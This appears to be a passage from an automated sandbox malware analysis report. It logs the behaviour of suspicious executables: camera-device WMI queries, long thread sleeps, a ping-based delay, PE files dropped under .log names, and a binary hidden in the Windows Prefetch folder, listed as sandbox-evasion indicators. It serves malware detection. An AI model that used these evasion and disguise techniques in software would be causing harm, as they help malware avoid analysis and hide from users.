                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeMemory allocated: 810000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeMemory allocated: 1A500000 memory reserve | memory write watchJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeMemory allocated: 8A0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeMemory allocated: 1A3F0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 600000Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 599868Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 599702Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 599000Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 598469Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 598109Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 597937Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 3600000Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 597780Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 300000Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 597422Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 596828Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 596453Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 595969Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 595712Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 595391Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 595062Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 594875Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 594562Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 594187Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 593969Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 593655Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 593453Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 593328Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 592906Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 592469Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 592062Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 591734Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 591312Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 591094Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 590734Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 590375Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 590062Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 589719Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 589420Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 589090Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 588773Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 588593Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 588439Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 588312Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 588203Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 588093Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 587984Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 587875Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 587756Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 587640Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 587531Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 587406Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 587281Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 587172Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 587062Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 586953Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 586844Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 586727Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 586624Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWindow / User API: threadDelayed 2416Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeWindow / User API: threadDelayed 7062Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeDropped PE file which has not been started: C:\Users\user\Desktop\oUNDhiUw.logJump to dropped file
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeDropped PE file which has not been started: C:\Users\user\Desktop\dFZxqctW.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeDropped PE file which has not been started: C:\Users\user\Desktop\yTUtFuTG.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeDropped PE file which has not been started: C:\Users\user\Desktop\luKnOVOf.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe TID: 2260Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 6160Thread sleep time: -30000s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -600000s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -599868s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -599702s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -599000s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -598469s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -598109s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -597937s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 2940Thread sleep time: -18000000s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -597780s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 2940Thread sleep time: -600000s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -597422s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -596828s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -596453s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -595969s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -595712s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -595391s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -595062s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -594875s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -594562s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -594187s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -593969s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -593655s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -593453s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -593328s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -592906s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -592469s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -592062s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -591734s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -591312s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -591094s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -590734s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -590375s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -590062s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -589719s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -589420s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -589090s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -588773s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -588593s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -588439s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -588312s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -588203s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -588093s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -587984s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -587875s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -587756s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -587640s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -587531s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -587406s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -587281s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -587172s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -587062s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -586953s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -586844s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -586727s >= -30000sJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe TID: 3552Thread sleep time: -586624s >= -30000sJump to behavior
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_00200C97 FindFirstFileExW,0_2_00200C97
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_00200D48 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00200D48
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_00200C97 FindFirstFileExW,5_2_00200C97
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_00200D48 FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00200D48
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 6_2_0041B6EA FindFirstFileExW,6_2_0041B6EA
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeCode function: 12_2_00007FF848F2D59A GetSystemInfo,12_2_00007FF848F2D59A
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 30000Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 600000Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 599868Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 599702Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 599000Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 598469Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 598109Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 597937Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 3600000Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 597780Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 300000Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 597422Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 596828Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 596453Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 595969Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 595712Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 595391Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 595062Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 594875Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 594562Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 594187Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 593969Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 593655Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 593453Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 593328Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 592906Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 592469Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 592062Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 591734Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 591312Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 591094Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 590734Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 590375Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 590062Jump to behavior
